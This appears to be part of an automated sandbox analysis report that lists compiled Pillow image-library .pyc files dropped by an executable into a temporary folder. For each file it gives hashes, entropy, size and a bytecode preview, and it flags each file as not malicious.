                                                                                                                                            Preview:...........eX...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.d.g.................d.S.)......)...annotationsN.....)...Image..ImageFile..ImagePalette)...i16le)...i32le....o8c.....................p.....t...........|...............d.k.....o#t...........|.d...............d.v.o.t...........|.d...............d.v.S.).N..........)......i.........).r.........)...len..i16)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\FliImagePlugin.py.._acceptr........s@.........F.....q.......&........N.N..........&........O.O.v..%..........c.....................8.....e.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z.d.S.)...FliImageFile..FLIz.Autodesk FLI/FLC AnimationFc.....................4.....|.j...............................d...............}.t...........|...............r.|.d.d.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\FontFile.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5156
                                                                                                                                            Entropy (8bit):5.361707024961492
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:JHwPPVRiouzk99l68I69ezTFVO3TUV4mVUqb3Ut90O3L2g:ts08p4zvqYV4mVUqTUt9/LH
                                                                                                                                            MD5:47C5439B9E79ADFA1FE900D3F60DE5A8
                                                                                                                                            SHA1:131E60A07D16F4A8E48AB921836AE575E505029D
                                                                                                                                            SHA-256:1697388559129137E0C97FB57B8D2B02607E1CCC32AF8BDA5892C94A469D9AC8
                                                                                                                                            SHA-512:23ECC5C9EEDE7134C7BC75B408C48EC16FF32EF10370076664DE18088D66C3152F8F65C59A4DD804C16021B01B289B65BD98EC318F343C3AF8F8832DFA0C5BF9
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................\.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z.d.d...Z...G.d...d...............Z.d.S.)......)...annotationsN)...BinaryIO.....)...Image.._binaryi .....fpr......values.7tuple[int, int, int, int, int, int, int, int, int, int]..return..Nonec.....................t.....|.D.]4}.|.d.k.....r.|.d.z...}.|.......................t...........j.........|................................5d.S.).z0Write network order (big-endian) 16-bit sequencer....i....N)...writer......o16be).r....r......vs.... .`C:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\FontFile.py..puti16r........sN..............#....#......q.5.5......J.A............q..!..!..".."..".."....#....#.....c.....................B.....e.Z.d.Z.U.d.Z.d.Z.d.e.d.<...d.d...Z.d.d...Z.d.d...Z.d.d...Z.d.S.)...FontFilez)Base class for raster font file handlers.Nz.Image.Image | None..bitmapr....r....c.....................*.....i.|._.........d.g.d.z...|._.........d.S.).N.....)

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\FpxImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):7881
                                                                                                                                            Entropy (8bit):5.339073947141581
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:A4dxSuPmjKUto5xhXY4LSArynKM5i+NOQh:AUxSimZ+/u4LShnKM7B
                                                                                                                                            MD5:A307280535B7B79E051C97E772573B3C
                                                                                                                                            SHA1:8B6E7F79F11A269348B78F973294D2A5FDB06230
                                                                                                                                            SHA-256:F14B9414F1B74BF6E94FF363DA20DA97F0737B3D2012FEC5B4945D95474DD685
                                                                                                                                            SHA-512:B1875F7ACA59C17FFDFC3B4C15FA99C85CB4A41D5E6FC0B8FCF3400CBA02DA80B85B92C254CFA1DB23FDDE85722E1511E61D9FAEFDA6D4185513E2B68DB1CA96
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........eF...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.d.d.d.d.d.d...Z.d...Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.................d.S.)......)...annotationsN.....)...Image..ImageFile)...i32le)...A..L).r....r....)...RGBA..LA)...RGBz.YCC;P).r....z.YCCA;P).r....r....).r....r....).).i....).i....).i....i....).i....i....i....).i....i....i....i....).i....i....i....).i....i....i....i....c.....................2.....|.d.d.............t...........j.........k.....S.).N.....)...olefile..MAGIC)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\FpxImagePlugin.py.._acceptr....,...s..........".1.".:......&..&.....c.....................L.......e.Z.d.Z.d.Z.d.Z.d...Z.d.d...Z.d.d...Z.d...Z...f.d...Z...f.d...Z...x.Z.S.)...FpxImageFile..FPX..FlashPixc.............................t...........j.........|.j.......................|._.........n$#.t.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\FtexImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):5361
                                                                                                                                            Entropy (8bit):5.500214936073766
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:YxQ4HUHtK0WYFWx5/X9OHdeO2KxRC4msfPdUmqqRZjNRP:YxycMgO2GNmsH+mRnjz
                                                                                                                                            MD5:18F2D8B12577985981E33F8E5D496758
                                                                                                                                            SHA1:4197FAD6C1FA0373909321BF91D759825AA45B05
                                                                                                                                            SHA-256:B9C71DD3FBDC28946C279E2F568B4B6FF16A9111A0060D26963EF46999808AEE
                                                                                                                                            SHA-512:4AD7034FAD169B7B343C5F372F38EAE0683A105AA7CE8D0E5B3EB1AC0F14FB0F40271257A52F0BEEA812E2FCF9DDC9DD49D2152FD6537316B6D3C11D46656592
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.Z.d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.Z...G.d...d.e...............Z...G.d...d.e.j.......................Z.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.d.g.................d.S.).a.....A Pillow loader for .ftc and .ftu files (FTEX).Jerome Leclanche <jerome@leclan.ch>..The contents of this file are hereby released in the public domain (CC0).Full text of the CC0 license:. https://creativecommons.org/publicdomain/zero/1.0/..Independence War 2: Edge Of Chaos - Texture File Format - 16 October 2001..The textures used for 3D objects in Independence War 2: Edge Of Chaos are in a.packed custom format called FTEX. This file format uses file extensions FTC.and FTU..* FTC files are compressed textures (using standard texture compression)..* FTU files are not compressed..Texture File Format.The FTC and FTU texture files both use the same format. This.has the following structure:.{header}.{form

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\GbrImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3848
                                                                                                                                            Entropy (8bit):5.128509126006438
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:e1at2Izx4VX2AB+ErMWyDqh9VWGpBfFptCbORzWwlZN7g4XRRuUWOLR3Q+dIzG:SMu1+ErDyu3XQSRDZN7ge/3WO9g+uzG
                                                                                                                                            MD5:2A5DC370DEDFDE2BBEA337B75ACE7BF7
                                                                                                                                            SHA1:53A66EC42EDAB3A6EE0FABB7028202E9A269E9DE
                                                                                                                                            SHA-256:1B0D6C21774961B441A2AC2F31A53F287965772A56B8360DC878BBB8ED59DA75
                                                                                                                                            SHA-512:2B8839973E7A5BB10A38F566EA2BBA6E3A0D4761F7B1F2B614CD283FAAB9394B4ADE6F7268526EED371B23EEA118000F31E75825513714FAD0AFC01D060A7618
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d...Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........e.j.........d.................d.S.)......)...annotations.....)...Image..ImageFile)...i32bec.....................t.....t...........|...............d.k.....o%t...........|.d...............d.k.....o.t...........|.d...............d.v.S.).N.....r................r.........)...len..i32)...prefixs.... .fC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\GbrImagePlugin.py.._acceptr.... ...s7.........v.;.;.!.....Q...F.A.....". 4..Q...V.Q.....6.9Q..Q.....c.....................".....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.S.)...GbrImageFile..GBRz.GIMP brush filec...........................t...........|.j...............................d.............................}.|.d.k.....r.d.}.t...........|.................t...........|.j...............................d.............................}.|.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\GdImageFile.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):3470
                                                                                                                                            Entropy (8bit):5.640539279136405
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:lL/qW9PGiTCbA9PTisiFkx4Fcj5uqpqRTfq3lK0w0w222222m:lLCqPhTCcPm3Fkx4NmqRTfkrw0w2222M
                                                                                                                                            MD5:ACCA1B8760E1E354BF538328B5A2C192
                                                                                                                                            SHA1:90A4DFD04C48C6B4773F2CF0AE850CB59D751C5A
                                                                                                                                            SHA-256:C526A51945A68010F9B838514D95BB465A382E0B8C26B036956E41C96D320C39
                                                                                                                                            SHA-512:0AF35949899D6415FF7F87A3B35760366842464DB618C25E6DBE2B44E9AA1B1C18969BB27C334754F2952E5DDBC4D8AF63A4681D80E0E8673139C2D744537473
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................p.....d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e.j.......................Z.d.d...Z.d.S.).a....... note::. This format cannot be automatically recognized, so the. class is not registered for use with :py:func:`PIL.Image.open()`. To open a. gd file, use the :py:func:`PIL.GdImageFile.open()` function instead..... warning::. THE GD FORMAT IS NOT DESIGNED FOR DATA INTERCHANGE. This. implementation is provided for convenience and demonstrational. purposes only.......)...annotations.....)...ImageFile..ImagePalette..UnidentifiedImageError)...i16be)...i32bec..................... .....e.Z.d.Z.d.Z.d.Z.d.Z.d...Z.d.S.)...GdImageFilea%.... Image plugin for the GD uncompressed format. Note that this format. is not supported by the standard :py:func:`PIL.Image.open()` function. To use. this plugin, you have to import the :py:mod:`PIL.GdImageFile` module and. use the :py:func:`PIL.GdImageFile.open()` fu

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\GifImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):41571
                                                                                                                                            Entropy (8bit):5.21663174962628
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:768:qpTmJactbslozbV/9N+yCqd54qrzsKUzBln:IctbslozbVJCqjXrzsjn
                                                                                                                                            MD5:FA64D99D32BACC0D77530177B68491E9
                                                                                                                                            SHA1:94498EA5194A705DED49DE849046A84ED19DB35C
                                                                                                                                            SHA-256:BE0F7AAD4837171AC9A60D7E8C0F3EA15FE3683D3A52BF2518D181E9FE3C838C
                                                                                                                                            SHA-512:E088C2F0AD8E15EEC2B523DD60663116A05D7CAC9803CA9433A9B28A735FCB49818E6254F035A464BFC24C56377A573ABE45E213DF0ED6323472E16A550CCE61
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................B.....d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....G.d...d.e...............Z.e.j.........Z.d...Z...G.d...d.e.j.......................Z.d.d.d.d...Z.d...Z.d...Z.d...Z.d...Z.d...Z d...Z!d(d...Z"d...Z#d...Z$d...Z%d.Z&d...Z'd...Z(d...Z)d...Z*d ..Z+d!..Z,d"..Z-d)d#..Z.d*d%..Z/..e.j0........e.j1........e.e...................e.j2........e.j1........e"..................e.j3........e.j1........e!..................e.j4........e.j1........d&..................e.j5........e.j1........d'................d.S.)+.....)...annotationsN)...IntEnum.....)...Image..ImageChops..ImageFile..ImageMath..ImageOps..ImagePalette..ImageSequence)...i16le)...o8)...o16lec...........................e.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.S.)...LoadingStrategyz... versionadded:: 9.1.0r....r.........N)...__name__..__module__..__qualname__..__doc__..RGB_AFTER_FIRST. RGB_AFTER_DIFFERENT_PALETTE_ONLY..RGB_ALWAYS........f

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\GimpGradientFile.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):6121
                                                                                                                                            Entropy (8bit):5.22373022738061
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:96:vy9wuNHS8q/GWItDUmvklSc5006pW5cq4OOO0j6WnBAtKZfg/Z89SSSJgT:vyWuJS8HBklSc50J686WatEVSSSJC
                                                                                                                                            MD5:4F160EE63279DB2AC057656482DC7EDC
                                                                                                                                            SHA1:7D6935FBF7453697D4AC5C4604F31F6A163C5027
                                                                                                                                            SHA-256:A10531B49CED1C419A7021ED5330A40FEA4A8A37C08E94C34288BFBB30B55773
                                                                                                                                            SHA-512:1D6AE3E193D936C6B417D0CD54BDCAA9E322A71475B816A0C5AC317074D7FE82AFA702C596FA5571BE39B4EA73F3F39842E95EBE26372B12F55D2C46CAFEEDCC
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.Z...d...Z.d...Z.d...Z.d...Z.d...Z.e.e.e.e.e.g.Z.....G.d...d...............Z...G.d...d.e...............Z.d.S.).z..Stuff to translate curve segments to palette values (derived from.the corresponding code in GIMP, written by Federico Mena Quintero..See the GIMP distribution for more information.)......)...annotations)...log..pi..sin..sqrt.....)...o8g.....|.=c.....................|.....|.|.k.....r.|.t...........k.....r.d.S.d.|.z...|.z...S.|.|.z...}.d.|.z...}.|.t...........k.....r.d.S.d.d.|.z...|.z...z...S.).Ng................?........?)...EPSILON....middle..poss.... .hC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\GimpGradientFile.py..linearr........s`.........f.}.}....G..........3......9.v..%..%....F.l......v........G..........3......s...V..+..+..+.....c.....................l.....|.t...........d...............t...........t...........|.t..................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\GimpPaletteFile.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2550
                                                                                                                                            Entropy (8bit):5.13923005270712
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:CAGpvDwXkPx9T2QMUV4XXmNkp0/NgkifX8U9VsYA4uFkLgqkYSSSY:FG2kDMs4HmepYgtfX8UcYlyASSSY
                                                                                                                                            MD5:5843FED1148DA8F27C4593A392920D61
                                                                                                                                            SHA1:B76FD8851A1264F807729B34B0791BF3C8BB716C
                                                                                                                                            SHA-256:094F2DE08A7F880A2674D0BE9BE99DA174D21DDF92F8C4E19F73B7026066C3F7
                                                                                                                                            SHA-512:8DD067556CD4F379CDD65BF332DA038D4400F871F88281C2C9303C0DBBA6F3652239A62D484D56D0C5053690F187D3F632029F97E83C02F4654B400C71F194DB
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e..........................@.....d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z.....G.d...d...............Z.d.S.)......)...annotationsN.........o8c.....................".....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.S.)...GimpPaletteFilez'File handler for GIMP's palette format...RGBc...........................d...t...........d...............D...............|._.........|.....................................d.d.............d.k.....r.d.}.t...........|.................t...........d...............D.].}.|.....................................}.|.s...n.t...........j.........d.|...............r..0t...........|...............d.k.....r.d.}.t...........|.................t...........t...........t...........|.....................................d.d.........................................}.t...........|...............d.k.....r.d.}.t...........|.................t...........|.d.........................t...........|.d.........................z...t...........|.d.........................z...|.j.........|.<.....d..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\GribStubImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2730
                                                                                                                                            Entropy (8bit):5.1077014674130226
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:Ievs20Kqi4PIciI4GrS3PVsH51CA33aiMP/6q2UxguUo7fZVv:dvUfi4eBwS3iZ1fMPKUxgux7Xv
                                                                                                                                            MD5:853AFEB67A360D4AA86E7B985A185A01
                                                                                                                                            SHA1:3E3656CD2C5352E323FAE3636FCEC3E20F14C46C
                                                                                                                                            SHA-256:B55766B7956C7CA87D7516BACF2F05AC56AAEADE6F6CA5726922E45019276467
                                                                                                                                            SHA-512:A2A2D54413C44754DB3B40C7655A9B44CC69B77C3DF3D1D6ECD75B4A9650704816421D13D1298DFFFA9F2C25164B4B6229B7887CBFAE89F8AEE42BCBF3AFD931
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e|...............................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.a.d...Z.d...Z...G.d...d.e.j.......................Z.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d.................d.S.)......)...annotations.....)...Image..ImageFileNc...........................|.a.d.S.).z_. Install application-specific GRIB image handler... :param handler: Handler object.. N...._handler)...handlers.... .kC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\GribStubImagePlugin.py..register_handlerr........s............H.H.H.....c.....................6.....|.d.d.............d.k.....o.|.d...........d.k.....S.).N.....s....GRIB.....r......)...prefixs.... r......_acceptr.... ...s".........".1.".:.... ..3.V.A.Y.!.^..3r....c.....................".....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.S.)...GribStubImageFile..GRIBc.....................R.....|.j.............................................}.t

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\Hdf5StubImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):2701
                                                                                                                                            Entropy (8bit):5.1190072446741
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:48:mc72pSq93reIciF44XgrS3P3JyeA33/g/NH5BiD6Vk8Z2o:mcQ3BrB6PS3QMFiD6VUo
                                                                                                                                            MD5:2067A2F94066641DF068190BBA8C1CB9
                                                                                                                                            SHA1:02D87DDF2B1A58CF5D51B422FFA07A6F7EE01AF6
                                                                                                                                            SHA-256:42850F9BE2EDAC5177163D0B039B3D9F0073960F4716C768BDDF99DAAD3C039E
                                                                                                                                            SHA-512:032C888B062AC6219DA7110776670A6BEA379E75228480CFE3EE0716ECB02AA75C3F11C177402B82D3FD4BB2107AF4578849E16A921F73DE9DF8150797B0FE72
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e................................d.d.l.m.Z...d.d.l.m.Z.m.Z...d.a.d...Z.d...Z...G.d...d.e.j.......................Z.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d.d.g.................d.S.)......)...annotations.....)...Image..ImageFileNc...........................|.a.d.S.).z_. Install application-specific HDF5 image handler... :param handler: Handler object.. N...._handler)...handlers.... .kC:\Users\Administrator\AppData\Local\Programs\Python\Python311\Lib\site-packages\PIL\Hdf5StubImagePlugin.py..register_handlerr........s............H.H.H.....c...........................|.d.d.............d.k.....S.).N.....s.....HDF......)...prefixs.... r......_acceptr.... ...s..........".1.".:..-..-..-r....c.....................".....e.Z.d.Z.d.Z.d.Z.d...Z.d...Z.d.S.)...HDF5StubImageFile..HDF5c.....................R.....|.j.............................................}.t...........|.j........................

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\IcnsImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):18465
                                                                                                                                            Entropy (8bit):5.237046795835785
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:192:v2U52nSR/yCCnHUdnPlqGtQB2A6Lvg3YmeKjpHbLcY2Feas/zrARva5t+e9BcuCb:+UEneCn0dnPxQB2A6LYGqdHhjuaKu4
                                                                                                                                            MD5:9AD5DF90F236543958ED2C0CFDED9D93
                                                                                                                                            SHA1:28A9F7B2A09C7FD032A00162E418CC2BB194AB42
                                                                                                                                            SHA-256:0CE0160EFB2F137E57719035708F2C978F1B38E8AE117EF5DE9814B50AE6D9B8
                                                                                                                                            SHA-512:CB75D7962D28DECF6A92B6541ED5747F85163A692C9D367D57486CD65F8A887FE411F0072AE032498A7D121BE9DC9CE3CAB5EFDCD611CD8D118D47859C3730A0
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........el0..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.....e.j.........d...............Z.e.r.d.d.l.m.Z...d.Z.d.Z.d...Z.d...Z.d...Z.d...Z.d...Z...G.d...d...............Z...G.d...d.e.j.......................Z.d...Z.d...Z...e.j.........e.j.........e.e...................e.j.........e.j.........d...................e.j.........e.j.........e...................e.j.........e.j.........d.................e.d.k.......r...e.e.j ......................d.k.....r...e!d...................e.j"..........................e#e.j ........d...........d...............5.Z$..e.e$..............Z%e%j&........d...........D.].Z'e'x.\...Z(Z)Z*e%_'........e%.+....................d.e(..d.e)..d.e*..d..................../..e.j#........e.j ........d.........................5.Z,e,.+....................d.................d.d.d.................n.#.1.s.w.x.Y.w...Y.....e.j-........d.k.....r...e.j.........d.................d.d.d.................d.S.#.1.s.w.x.Y.w...Y.....d.S.d.

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\IcoImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):14970
                                                                                                                                            Entropy (8bit):5.145935613422098
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:7dNtOxjD2CrnRTnXa1UWf5K07On0NQeKrp:7dNteBbRnXa1U05W0Ngrp
                                                                                                                                            MD5:7C728E61DB1DB57B98A33E0FA8D36974
                                                                                                                                            SHA1:077A4DC758CF859FD9C5453C51037F93F34CB92F
                                                                                                                                            SHA-256:8FC30AA1C4EBEB61C7054C822FEEFB6EFA86A0171CADF1D6193D658C0225E8DE
                                                                                                                                            SHA-512:B9D9227782492CF37F6E07C18B3C41F0C20FCF07595A3AE67115BD199339DBE85CB9B0F7D9EBDED4044AEB23A637CBC343FD4E9546EA73E7E83CAC1136D7A7BD
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e...............................d.d.l.m.Z...d.d.l.Z.d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.Z.d...Z.d...Z...G.d...d...............Z...G.d...d.e.j.......................Z...e.j.........e.j.........e.e...................e.j.........e.j.........e...................e.j.........e.j.........d...................e.j ........e.j.........d.................d.S.)......)...annotationsN)...BytesIO)...ceil..log.....)...BmpImagePlugin..Image..ImageFile..PngImagePlugin)...i16le)...i32le)...o8)...o16le)...o32les........c...........................|.......................t...........................|.j...............................d...............d.k.....}.|.j...............................d.g.d.................}.g.}.|.g.|.j...............................d.g...............z...}.|.j.........\...}.}.t...........t...........|.............................D...])}.|.d...........|.k.....s$|.d...........|.k.....s.|.d..........

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\ImImagePlugin.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:DIY-Thermocam raw data (Lepton 2.x), scale 0-0, spot sensor temperature 0.000000, unit celsius, color scheme 0, calibration: offset 0.000000, slope 2874260829752685519118412874243899392.000000
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):12763
                                                                                                                                            Entropy (8bit):5.506814596486421
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:384:+hMcwc8+p8rtFw1vnSWOMnyNtBO93bco1Kh:+hn8+p8ZFmOystBO93bcoK
                                                                                                                                            MD5:4D8FFEB7D16933923D7C62FBC44B4220
                                                                                                                                            SHA1:51C08AD2CD8AE616C134186430E0C6507358CF59
                                                                                                                                            SHA-256:A64561D302120D75AF503F578920E2215311255B3EBF67B52252B2CE6BC5D139
                                                                                                                                            SHA-512:2025029E372BF8FDF3042509B9E0B25F5DD52AFC71D51CBBD73C7F1144F3B1DAF45E988EC9F2E41C7586E338117B39069658833B546F528C63CC2CAFA58F0407
                                                                                                                                            Malicious:false
                                                                                                                                            Preview:...........e.,..............................d.d.l.m.Z...d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z...d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.d.Z.e.d.e.d.e.d.e.d.e.d.e.d.e.d.e.d.e.d.i.Z.i.d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d.d...d d!..d"d#..d$d%..d&d'..d(d)..d*d+..d,d-d.d/d0....Z.d1D.].Z.d2d3e.....f.e.d4e...d5..<...d2d3e.....f.e.d6e...d5..<.....d7D.]$Z.d8e.....d8e.....f.e.d4e...d5..<...d8e.....d8e.....f.e.d6e...d5..<....%d9D.].Z.d:d8e.....f.e.d4e...d5..<...d:d8e.....f.e.d6e...d5..<.......e.d;d<..............D.].Z.d2d3e.....f.e.d6e...d5..<.......e.j.........d=..............Z.d>..Z...G.d?..d@e.j.......................Z.dAdBd)dCd+dDdEdFdGdHd.d,d-d.dIdJ..Z.dK..Z...e.j.........e.j.........e...................e.j.........e.j.........e...................e.j.........e.j.........dL................d.S.)M.....)...annotationsN.....)...Image..ImageFile..ImagePalette..Comment..Datez.Digitalization equipmentz.File size (no of images)..Lut..Namez.Scale (x,y)z.Image size (x*y)z.Image typez.0 1 i

                                                                                                                                            C:\Users\user\AppData\Local\Temp\RarSFX0\lib\PIL\Image.pyc

                                                                                                                                            Download File
                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\1034017001\db3cab6cee.exe
                                                                                                                                            File Type:data
                                                                                                                                            Category:dropped
                                                                                                                                            Size (bytes):168258
                                                                                                                                            Entropy (8bit):5.451845442670416
                                                                                                                                            Encrypted:false
                                                                                                                                            SSDEEP:3072:D5PzSnGTUtAGFzUJobX+MbfZIAHno9074bdR8dG51ivDRGiTYe3NX:D5zCFtAGFzEobX+MbfZIAHnhmdR8d62T
                                                                                                                                            MD5:61C912855FA7AD1F1503C6C734B3302B
                                                                                                                                            SHA1:FA8843CB71A39B7651E5BCE40DD34EE2B4DEF3F8
                                                                                                                                            SHA-256:CC3773540041ECD0E484D607CEAD95F9B9D0E57D15BCBCCC599BA24CC64CC5A2
                                                                                                                                            SHA-512:37730B5DCEFCBBA5103CC040B29A62A4C0961B55AC1E646BE54885B8AFA224E03B0E96DE7D0A7E70FEC7E081FF123040F5E81C5BD91C3DEB4551C7D2CBD6BF42
                                                                                                                                            Malicious:false
